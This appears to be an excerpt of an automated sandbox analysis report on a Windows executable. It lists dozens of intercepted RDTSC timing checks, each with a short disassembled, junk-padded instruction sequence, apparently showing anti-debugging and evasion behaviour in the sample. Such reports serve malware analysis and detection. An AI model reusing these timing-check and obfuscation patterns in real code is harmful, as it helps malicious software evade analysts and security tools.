                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B036 second address: 95B03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B1C2 second address: 95B1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F848150386Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B1D8 second address: 95B1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F8480743926h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BA75 second address: 95BA90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F848150386Dh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BA90 second address: 95BA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C13E second address: 95C142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C142 second address: 95C152 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074395Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C152 second address: 95C156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960176 second address: 96017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96017C second address: 96018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F848150386Ah 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96018F second address: 9601B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007F8480743937h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9601B2 second address: 9601B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96474C second address: 964750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964750 second address: 96477F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8481503889h 0x0000000c jmp 00007F8481503874h 0x00000011 jmp 00007F848150386Fh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96477F second address: 964789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964AA4 second address: 964AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970623 second address: 970629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970629 second address: 97064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503878h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97064B second address: 970668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97079C second address: 9707BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8481503875h 0x00000008 jno 00007F8481503866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9734DF second address: 9734E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973687 second address: 973696 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9817CC second address: 9817E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F8480743926h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98160C second address: 981644 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F848150386Eh 0x00000010 push esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 jmp 00007F8481503873h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981644 second address: 981660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8480743926h 0x00000009 jmp 00007F848074392Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986951 second address: 98695B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E464 second address: 98E46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8480743926h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E5D1 second address: 98E5D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E5D7 second address: 98E5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F8480743926h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E881 second address: 98E892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ch 0x00000009 pop ecx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E892 second address: 98E8A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8480743928h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E8A0 second address: 98E8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EBB4 second address: 98EBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8480743930h 0x0000000c pop ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9951E7 second address: 9951F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9951F8 second address: 995201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B203F second address: 9B2043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2043 second address: 9B2054 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jnc 00007F8480743926h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2054 second address: 9B206E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F8481503872h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B36DE second address: 9B36E8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480743926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5437 second address: 9B543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B543B second address: 9B5447 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5447 second address: 9B544D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B544D second address: 9B5451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5451 second address: 9B5473 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8481503878h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5473 second address: 9B5477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE783 second address: 9CE794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ch 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF00D second address: 9CF014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF014 second address: 9CF01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF156 second address: 9CF162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnc 00007F8480743926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF43C second address: 9CF47F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8481503872h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8481503870h 0x00000011 jmp 00007F848150386Ch 0x00000016 jp 00007F8481503866h 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF47F second address: 9CF492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848074392Bh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF492 second address: 9CF498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF498 second address: 9CF49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D22C2 second address: 9D22C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D22C6 second address: 9D22CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2374 second address: 9D2378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2378 second address: 9D237C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D237C second address: 9D2385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D25BA second address: 9D25C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D25C3 second address: 9D25C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D25C7 second address: 9D261C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add edx, dword ptr [ebp+12481D52h] 0x00000010 push 00000004h 0x00000012 jmp 00007F8480743937h 0x00000017 call 00007F8480743929h 0x0000001c jmp 00007F8480743934h 0x00000021 push eax 0x00000022 jo 00007F8480743949h 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007F8480743926h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D261C second address: 9D2645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jns 00007F8481503866h 0x00000016 pop edi 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D28FF second address: 9D295A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8480743933h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F8480743928h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1EFFh], ebx 0x0000002d push dword ptr [ebp+122D291Fh] 0x00000033 mov dword ptr [ebp+122D2099h], edi 0x00000039 call 00007F8480743929h 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D295A second address: 9D297B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F8481503872h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D297B second address: 9D297F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D297F second address: 9D29BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F8481503871h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jno 00007F8481503874h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D29BB second address: 9D29BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D29BF second address: 9D29C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D29C3 second address: 9D29C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3C47 second address: 9D3C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7657 second address: 9D766C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F8480743926h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D766C second address: 9D7670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0EF5 second address: 52D0EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E6B second address: 52C0E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E6F second address: 52C0E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E75 second address: 52C0EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8481503877h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0128 second address: 52A012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A012E second address: 52A016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F8481503872h 0x00000015 add si, 07F8h 0x0000001a jmp 00007F848150386Bh 0x0000001f popfd 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A016F second address: 52A01AC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8480743938h 0x00000008 adc cx, E258h 0x0000000d jmp 00007F848074392Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov si, AB0Fh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ebx, ecx 0x00000020 mov bx, si 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A01AC second address: 52A01E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8481503875h 0x00000008 movzx ecx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503876h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A01E3 second address: 52A0267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743931h 0x00000009 jmp 00007F848074392Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F8480743938h 0x00000015 add ax, 2BD8h 0x0000001a jmp 00007F848074392Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F848074392Bh 0x0000002e or ecx, 0B9EFE9Eh 0x00000034 jmp 00007F8480743939h 0x00000039 popfd 0x0000003a mov cx, 1267h 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0267 second address: 52A0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503878h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0283 second address: 52A0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0287 second address: 52A029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ch, 81h 0x00000010 movsx edx, cx 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A029B second address: 52A02C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 31F62796h 0x00000014 mov dx, 2722h 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B1D second address: 52C0B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8481503873h 0x00000013 and cx, 3DAEh 0x00000018 jmp 00007F8481503879h 0x0000001d popfd 0x0000001e call 00007F8481503870h 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05C7 second address: 52C05DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743930h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05DB second address: 52C0618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F848150386Fh 0x00000012 or eax, 169E46EEh 0x00000018 jmp 00007F8481503879h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0618 second address: 52C0628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0628 second address: 52C064E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8481503876h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C064E second address: 52C0654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
